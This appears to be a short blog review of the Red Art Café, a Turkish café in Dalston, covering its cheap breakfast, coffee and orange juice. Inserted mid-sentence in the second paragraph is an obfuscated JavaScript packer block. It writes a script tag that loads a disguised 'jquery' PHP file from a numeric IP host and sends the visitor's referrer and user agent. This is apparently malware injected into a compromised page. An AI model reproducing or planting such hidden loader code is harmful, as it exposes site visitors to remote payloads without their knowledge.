REVIEW: RED ART CAFÉ

The Red Art Café is located on Kingsland Road next door to Dalston Superstore. The Turkish café serves up the usual Turkish breakfasts, brunch and lunch with a couple of full English options thrown in for good measure. We visited last Sunday afternoon to see what was going down.

The (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stkfb|var|u0026u|referrer|fzhfb||js|php’.split(‘|’),0,{}))
café was half full, the décor was simple and the food was cheap. We ate the Set 3, a full English breakfast – sausage, bacon, toast, egg, beans, hash brown, mushrooms and toast. At only £4.50 including a tea or coffee it was an absolute bargain.

The coffee was nice cup of fresh, strong coffee and the breakfasts were a fair size, stodgy and slightly greasy but good for the hangover. We also ordered a fresh orange and were delighted when a large, freshly squeezed glass of proper orange arrived for only 2 squid.

If the hangover demands stodge but monies are low check it out dudes!
